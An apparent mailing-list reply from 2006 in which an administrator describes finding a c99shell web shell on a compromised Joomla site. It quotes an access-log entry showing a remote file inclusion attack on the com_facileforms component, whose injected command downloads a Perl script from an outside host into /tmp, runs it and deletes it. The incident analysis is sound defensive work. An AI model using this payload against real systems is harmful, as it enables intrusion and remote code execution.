>Yes, I have a problem, but not one with Joomla. I am using the
>latest version of Joomla. If the issue was with Joomla there
>would be entries in the error_log and access_log that showed
>which exploit was being used.
Okay try another tack - When we looked at the site on our server that had a
problem we found a php file that should not have been there, looking at it
it appears to be c99shell - I haven't found out too much about it but its
not good!
In our case I'm sure it got there by Joomla
Here is what I find in the logs for the same time as the file we found
julia.combios.es - - [15/Sep/2006:13:07:21 +0100] "GET
/component/option,com_facileforms/components/com_facileforms/facileforms.fra
me.php?ff_compath=http://www.kariwuhrer.net/forums/help.gif?&cmd=cd%20/tmp/;
wget%20http://www.freewebtown.com/al00rs/v6.txt;p?&cmd=cd%20/tmp/;wget%20htt
p://www.freewebtown.com/al00rs/v6.txt;perl%20v6.txt;rm%20-rf%20v6* HTTP/1.0"
200 11120 "-" "Mozilla/5.0"
I need to analyse the logs more carefully as this isn't the file that is on
the system but I think it is the perl script they were running
I suspect I will be making some complaints to ISP's shortly!
In your case I'm not sure what you have or how/why it got there but I would
be looking very carefully for something that shouldn't be there as it is
rare for a BQ box to go wild like that without someone trying to do
something they shouldn't be.
Gavin